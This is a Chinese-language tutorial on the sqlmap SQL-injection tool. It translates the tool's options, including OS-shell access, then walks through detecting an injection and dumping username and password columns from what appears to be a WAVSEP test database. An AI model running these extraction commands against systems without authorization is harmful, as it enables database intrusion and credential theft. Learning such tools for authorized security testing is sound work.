一、sqlmap选项

　　目标:至少要选中一个参数

　　-u URL, --url=URL 目标为 URL 

　　-g GOOGLEDORK 将谷歌dork的结果作为目标url

　　请求:

　　这些选项可用于指定如何连接到目标URL

　　--data=DATA 数据字符串通过POST发送

　　--cookie=COOKIE HTTP Cookie的值

　　--random-agent 随机选择 HTTP User-Agent 头的值

　　--proxy=PROXY 使用代理去连接目标URL

　　--tor 使用匿名网络

　　--check-tor 检查Tor是否正确使用

　　注入:

　　这些选项可用于指定要测试哪些参数，提供自定义注入负载和可选篡改脚本

　　-p TESTPARAMETER 可测试的参数

　　--dbms=DBMS 将后端DBMS强制到此值

　　检测:

　　这些选项可用于定制检测阶段

　　--level=LEVEL 执行的测试级别(1-5, 默认 1)

　　--risk=RISK 执行测试的风险 (1-3, 默认 1)

　　技术:

　　这些选项可用于调整特定SQL注入的测试的技术

　　--technique=TECH SQL注入技术选择 (默认 "BEUSTQ")

　　枚举:

　　T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外，还可以运行自己的SQL语句

　　-a, --all 检索全部

　　-b, --banner 检索 banner

　　--current-user 检索当前用户

　　--current-db 检索当前数据库

　　--passwords 列出用户密码的hash值

　　--tables 列出表

　　--columns 列出字段

　　--schema 列出DBMS schema

　　--dump Dump DBMS数据库表的条目

　　--dump-all Dump 所有DBMS数据库表的条目

　　-D DB 指定数据库

　　-T TBL 指定表

　　-C COL 指定字段

　　操作系统访问:

　　这些选项可用于访问后端数据库管理系统底层操作系统

　　--os-shell 提示为交互式操作系统shell

　　--os-pwn 提示为OOB外壳，Meterpreter或VNC

　　通用:

　　这些选项可用于设置一些通用的工作参数

　　--batch 永远不要要求用户输入，使用默认行为

　　--flush-session 刷新当前目标的会话文件

　　杂项:

　　--sqlmap-shell 提示输入交互式sqlmap shell

　　--wizard 初学者的简单向导界面

　　二、sqlmap使用

　　1.对url进行检测，判断是否存在SQL注入

　　python sqlmap.py -u "url" --batch

　　

　　跑完以后发现存在注入，，参数是username 注入类型为盲注，数据库是mysql,后端语言是jsp

　　2.获取数据库

　　python sqlmap.py -u URL --dbs --batch 获取全部数据库

　　python sqlmap.py -u URL --current-db --batch 获取当前数据库

　　

　　获取到了当前的数据库为 wavsepDB

　　3.获取当前数据库里所有表

　　python sqlmap.py -u URL -D wavsepDB --tables --batch

　　

　　4.获取表的字段

　　python sqlmap.py -u URL -D wavsepDB -T users --columns --batch

　　

　　如图获取到上面字段以后，我们就开始dump字段内容了。

　　5.dump字段内容

　　python sqlmap.py -u URL -D wavsepDB -T users -C "password,username" --dump --batch

　　如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据

　　--dump 可以换成 --dump-all则导出全部的内容

　　

(责任编辑：范老师)